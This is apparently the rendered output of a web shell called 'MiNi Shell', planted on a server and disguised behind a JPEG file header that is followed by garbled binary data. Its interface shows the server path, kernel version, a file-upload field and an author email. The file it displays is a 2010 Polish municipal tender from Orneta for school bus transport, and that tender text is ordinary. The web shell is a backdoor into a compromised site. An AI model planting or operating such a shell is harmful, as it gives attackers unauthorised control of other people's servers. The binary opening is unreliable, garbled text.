JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100714/208048-N-2010.html

<p class="kh_header"><b>Orneta: Dowóz uczniów wraz z opiekunami do przedszkoli, szkół podstawowych i gimnazjum na terenie gminy Orneta oraz odwóz do miejsca zamieszkania po zakończeniu zajęć szkolnych w roku szkolnym 2010/2011
Część 1: Zadanie nr 1; Część 2: Zadanie nr 2; Część 3: Zadanie nr 3</b><br>
<b>Numer ogłoszenia: 208048 - 2010; data zamieszczenia: 14.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Orneta , pl.    Wolności 26, 11-130 Orneta, woj. warmińsko-mazurskie, tel. 055 2421116, faks 055 2422990.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.oneta.umig.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów wraz z opiekunami do przedszkoli, szkół podstawowych i gimnazjum na terenie gminy Orneta oraz odwóz do miejsca zamieszkania po zakończeniu zajęć szkolnych w roku szkolnym 2010/2011
Część 1: Zadanie nr 1; Część 2: Zadanie nr 2; Część 3: Zadanie nr 3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usługi przewozowej polegającej na dowozie uczniów wraz z  opiekunami do przedszkoli, szkół podstawowych i gimnazjów na terenie gminy Orneta oraz odwozie do  miejsca zamieszkania po zakończeniu zajęć szkolnych  w roku szkolnym 2010/2011 z niżej   wymienionych miejscowości:

Część 1: Zadanie nr 1: z miejscowości Kumajny, Henrykowo, Nowy Dwór, Bogatyńskie, Karkajmy, Wojciechowo, Opin, Biały Dwór, Karbowo, Krosno  do przedszkoli ; szkół  Podstawowych Nr. 1 i 4  gimnazjów Nr. 1 i 2  w Ornecie oraz odwóz do wyżej wymienionych miejscowości po zakończeniu zajęć w szkole 
Planowana długość dziennej trasy - 222 km .
Planowana liczba uczniów na wszystkich trasach - 169 + opiekunowie

Część 2: Zadanie nr 2: z miejscowości Orneta, Drwęczno, Klusajny, Bażyny, Dąbrówka,  Osetnik, Chwalęcin,  Augustyny, Krzykały, do przedszkola i szkoły podstawowej w Bażynach; do przedszkoli , szkół  podstawowych Nr. 1 i 4  i gimnazjów Nr. 1 i 2  w Ornecie oraz odwóz do  wyżej wymienionych miejscowości po zakończeniu zajęć w szkole 
Planowana długość dziennej trasy  - 194 km .
Planowana liczba uczniów na wszystkich trasach -  115 + opiekunowie

Część 3: Zadanie nr 3: z miejscowości Henrykowo,, Kumajny, Wola Lipecka, Mingajny, Miłkowo,  Krosno  do przedszkola i szkoły podstawowej w Mingajnach , do  przedszkoli , szkół  podstawowych Nr. 1 i  4  i gimnazjów Nr. 1 i 2  w Ornecie oraz odwóz  do  wyżej wymienionych miejscowości po zakończeniu zajęć w szkole 
Planowana długość dziennej trasy  -  128 km .
Planowana liczba uczniów na wszystkich trasach -  91+ opiekunowie

2. Szczegółowy opis przedmiotu zamówienia przedstawiony został w Rozdziale III niniejszej SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający   przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt 6  ustawy Pzp. Wielkość zamówienia uzupełniającego do 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.17.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże , że posiada zezwolenie na podjęcie działalności gospodarczej w zakresie krajowego transportu osób na zasadach określonych w ustawie  z dnia 06 września   2001r. o transporcie drogowym ( tj. Dz.U. z 2007r., Nr. 125, poz. 874 z późn. zm. ) 
Termin ważności dokumentu musi obejmować okres realizacji   zamówienia. 
Warunek dotyczy: Części 1 : Zadanie nr 1; Części 2 : Zadanie nr 2; Części 3: Zadanie nr 3 
Ocena spełnienia warunku  nastąpi  na podstawie załączonych przez wykonawcę do oferty dokumentów  wymienionych w  § 6 ust. 1 pkt 2 IDW 
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje  wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do  uzupełnienia  dokumentu .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a  jeżeli okres  prowadzenia działalności jest krótszy  w tym okresie wykonał należycie lub w  przypadku świadczeń okresowych i ciągłych wykonuje należycie co najmniej:
- 1 usługę polegająca na transporcie, przewozie osób o  wartości brutto nie mniejszej niż  120 000 zł 
Warunek dotyczy: Części 1 : Zadanie nr 1; Części 2 : Zadanie nr 2; Części 3: Zadanie nr 3 
Ocena spełnienia warunku nastąpi  na podstawie załączonych przez wykonawcę do oferty dokumentów i oświadczeń wymienionych w  § 6 ust. 1 pkt 3 IDW 
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia  dokumentu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy o którym mowa § 6 ust.1 pkt 1 IDW  
Warunek dotyczy: Części 1 : Zadanie nr 1; Części 2 : Zadanie nr 2; Części 3: Zadanie nr 3 
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje  wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do   uzupełnienia  dokumentu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy o którym mowa § 6 ust.1 pkt 1 IDW  
Warunek dotyczy: Części 1 : Zadanie nr 1; Części 2 : Zadanie nr 2; Części 3: Zadanie nr 3 
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje  wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do   uzupełnienia  dokumentu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez  wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy o którym mowa § 6 ust.1 pkt 1 IDW  
Warunek dotyczy: Części 1 : Zadanie nr 1; Części 2 : Zadanie nr 2; Części 3: Zadanie nr 3 
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW  
Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje  wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do   uzupełnienia  dokumentu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)Zgodnie z art. 144 ustawy Pzp Zamawiający dopuszcza możliwość dokonania czynności prawnej polegającej na zmianie postanowień zawartej umowy w sprawie zamówienia publicznego w stosunku  do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 
2)Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy:
a) Zmianę ilościowego zakresu rzeczowego  dla poszczególnych Części przedmiotu  
zamówienia w przypadku: zmiany przebiegu trasy, długości trasy (liczby km na  
danej trasie), liczby przewożonych uczniów, godzin dowozu i odwozu uczniów, rezygnacji z trasy  lub ograniczenia trasy (np. wyłączenie z trasy odwozu, miejscowości)  o ile zajdą takie okoliczności np. po zatwierdzeniu  planu zajęć przez dyrektorów szkół
Powyższa zmiana nie spowodują zmiany ceny jednostkowej za 1 km przewozu uczniów
b) Zmianę wynagrodzenia wykonawcy w przypadku:
- zmiany ilościowego zakresu rzeczowego  dla poszczególnych Części przedmiotu  
zamówienia o  której mowa  w lit. a) 
- zmiany stawki podatku VAT 
Zmianę (skrócenie) terminu umownego zakończenia realizacji poszczególnych Części   przedmiotu zamówienia do końca 1 semestru roku szkolnego 2010/2011  w przypadku  podjęcia przez Zamawiającego decyzji dotyczącej zmiany sposobu rozliczania za przewozy uczniów do przedszkoli,  szkół podstawowych i gimnazjów na terenie gminy  Orneta np. na podstawie imiennych biletów miesięcznych szkolnych
Powyższa zmiana (skrócenie) terminu zakończenia realizacji przedmiotu zamówienia  nie  spowoduje: zmiany ceny jednostkowej za 1 km przewozu uczniów oraz żadnych innych sankcji finansowych z tytułu wcześniejszego rozwiązania umowy na realizację poszczególnych części przedmiotu zamówienia
c) Zmianę (skrócenie) terminu umownego zakończenia realizacji poszczególnych Części   przedmiotu zamówienia do końca 1 semestru roku szkolnego 2010/2011  w przypadku  podjęcia przez Zamawiającego decyzji dotyczącej zmiany sposobu rozliczania za przewozy uczniów do przedszkoli,  szkół podstawowych i gimnazjów na terenie gminy  Orneta np. na podstawie imiennych biletów miesięcznych szkolnych
Powyższa zmiana (skrócenie) terminu zakończenia realizacji przedmiotu zamówienia  nie  spowoduje: zmiany ceny jednostkowej za 1 km przewozu uczniów oraz żadnych innych sankcji finansowych z tytułu wcześniejszego rozwiązania umowy na realizację poszczególnych części przedmiotu zamówienia
d)Zmianę w zatrudnieniu podwykonawców w przypadku, gdy Wykonawca oświadczył, iż wykona umowę osobiście w zakresie zgodnym ze SIWZ oraz zmiany osobowej   podwykonawców oraz zakresu podwykonawstwa, 
e)  Oznaczenie stron umowy, wyłącznie w wyniku dozwolonego w myśl ustawy Prawo zamówień publicznych następstwa prawnego albo zmiany nazwy lub innego 
oznaczenia strony (firmy) wynikającego z prawa albo dozwolonych prawem 
czynności powodujących taką zmianę.
f)  Konieczność wprowadzenia  zmian  wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a są one korzystne dla zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.orneta.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ornecie 11-130 Orneta , Plac Wolności 26 - Stanowisko d/s Zamówień publicznych (kam.A- parter).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2010 godzina 11:00, miejsce: Urząd Miejski w Ornecie 11-130 Orneta, Plac Wolności 26 - Sekretariat pok. nr 3..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usługi przewozowej polegającej na dowozie uczniów wraz z opiekunami z miejscowości Kumajny, Henrykowo, Nowy Dwór, Bogatyńskie,  
Karkajmy, Wojciechowo, Opin, Biały Dwór, Karbowo, Krosno  do przedszkoli ; szkół  Podstawowych Nr. 1 i 4  gimnazjów Nr. 1 i 2  w Ornecie oraz odwóz do wyżej wymienionych  miejscowości po zakończeniu zajęć w szkole 
Planowana długość dziennej trasy - 222 km .
Planowana liczba uczniów na wszystkich trasach - 169 + opiekunowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.17.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usługi przewozowej polegającej na dowozie uczniów wraz z opiekunami z miejscowości Orneta, Drwęczno, Klusajny, Bażyny, Dąbrówka,  Osetnik, Chwalęcin, Augustyny, Krzykały, do przedszkola i szkoły podstawowej w Bażynach; do przedszkoli , szkół  podstawowych Nr. 1 i 4  i gimnazjów Nr. 1 i 2  w Ornecie oraz odwóz  do  wyżej wymienionych miejscowości po zakończeniu zajęć w szkole 
Planowana długość dziennej trasy  - 194 km .
Planowana liczba uczniów na wszystkich trasach -  115 + opiekunowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.17.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usługi przewozowej polegającej na dowozie uczniów wraz z opiekunami z miejscowości Henrykowo,, Kumajny, Wola Lipecka, Mingajny, Miłkowo,   
Krosno  do przedszkola i szkoły podstawowej w Mingajnach , do  przedszkoli , szkół  
podstawowych Nr. 1 i  4  i gimnazjów Nr. 1 i 2  w Ornecie oraz odwóz  do  wyżej wymienionych  miejscowości po zakończeniu zajęć w szkole 
Planowana długość dziennej trasy  -  128 km .
Planowana liczba uczniów na wszystkich trasach -  91+ opiekunowie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9, 60.17.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com